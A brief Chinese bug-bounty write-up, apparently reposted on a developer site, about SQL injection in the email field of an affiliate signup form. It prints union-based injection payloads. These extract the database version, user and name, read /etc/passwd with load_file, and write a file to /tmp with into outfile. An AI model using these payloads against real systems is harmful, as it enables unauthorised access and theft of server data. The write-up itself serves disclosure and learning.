我像往常一样注册网站会员
然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。
这里的email参数存在 SQL 注入漏洞
于是我在请求框 [email=””]参数中插入SQL语句
' and 1=2 union all select concat_ws(0x3a,version(),user(),database())--+
结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。
现在我尝试使用SQL命令来读取文件
' and 1=2 union all select load_file('/etc/passwd')--+
接着尝试在/tmp目录写入文件
' and 1=2 union all select 'blablalba_bug_bounty_program' into outfile '/tmp/blablabla'--+
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 优化ElasticSearch写入效率
- golang 创建,读取,写入文件
- Kafka学习笔记 -- 写入数据
- Elasticsearch 写入原理深入详解
- 高频写入redis场景优化
- Laravel log 无法写入问题
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。